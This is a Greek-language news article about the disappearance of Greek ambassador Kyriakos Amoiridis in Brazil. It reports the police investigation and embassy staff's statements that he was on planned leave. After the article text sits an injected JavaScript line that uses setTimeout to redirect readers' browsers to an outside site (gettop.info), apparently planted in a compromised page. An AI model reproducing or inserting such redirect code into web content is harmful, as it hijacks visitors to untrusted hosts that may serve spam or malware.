Θρίλερ στη Βραζιλία: Αγνοείται εδώ και τρεις μέρες ο Έλληνας πρέσβης-Τι λένε οι εργαζόμενοι στην πρεσβεία

0
10

 

Ένα θρίλερ βρίσκεται σε εξέλιξη εδώ και 3 μέρες στη Βραζιλία καθώς έχουν χαθεί τα ίχνη του πρέσβη της Ελλάδας Κυριάκου Αμοιρίδη. Ο βραζιλιάνικος Τύπος μεταδίδει ότι ο Έλληνας πρέσβης δεν έχει δώσει σημάδια ζωής τις τελευταίες τρεις ημέρες.

amoiridis2

amoiridis

Σύμφωνα με όσα αναφέρουν τα δημοσιεύματα, την υπόθεση διερευνά η υπηρεσία ανθρωποκτονιών του Ρίο Ντε Τζανέιρο.
Ο 59χρονος διπλωμάτης διετέλεσε πρόξενος στο Ρίο από το 2001 ως το 2004, ενώ υπηρετεί ως πρέσβης στη Βραζιλία από τον Ιανουάριο του 2015.

amoiridis1
Την εξαφάνισή του επιβεβαίωσε, σύμφωνα με δημοσιεύματα, η βραζιλιάνικη αστυνομία.
article_11573
Πηγή προσκείμενη στην ελληνική πρεσβεία, μιλώντας στην εφημερίδα Folha, δήλωσε ότι η πρεσβεία ενημέρωσε την αστυνομία και το υπουργείο της Βραζιλίας, καθώς και το ελληνικό υπουργείο Εξωτερικών.

kiriakos-amiridis
Η Ελληνική Πρεσβεία δεν έχει σχολιάσει επίσημα στο μυστήριο, όπως επίσης δεν έχει σχολιάσει το ΥΠΕΞ.

Πάντως εργαζόμενοι στην ελληνική πρεσβεία στη Μπραζίλια αναφέρουν πως το μόνο που γνωρίζουν είναι ότι ο Κυριάκος Αμοιρίδης βρίσκεται σε άδεια από τις 22 Δεκεμβρίου.

«Λείπει σε προγραμματισμένο ταξίδι εκτός πόλης. Αναμένεται να επιστρέψει στην Μπραζίλια στις 9 Ιανουαρίου», είπαν χαρακτηριστικά στο enikos.gr. Οι εργαζόμενοι σημειώνουν πως πράγματι υπήρξε καταγγελία στην αστυνομία, όμως αυτή δεν έγινε από την πρεσβεία αλλά από κοντινό πρόσωπο του Έλληνα πρέσβη.

Σύμφωνα με τις ίδιες πηγές, μέχρι στιγμής η αστυνομία δεν έχει απευθυνθεί στους εργαζόμενους της πρεσβείας στο πλαίσιο της διερεύνησης της υπόθεσης.
setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here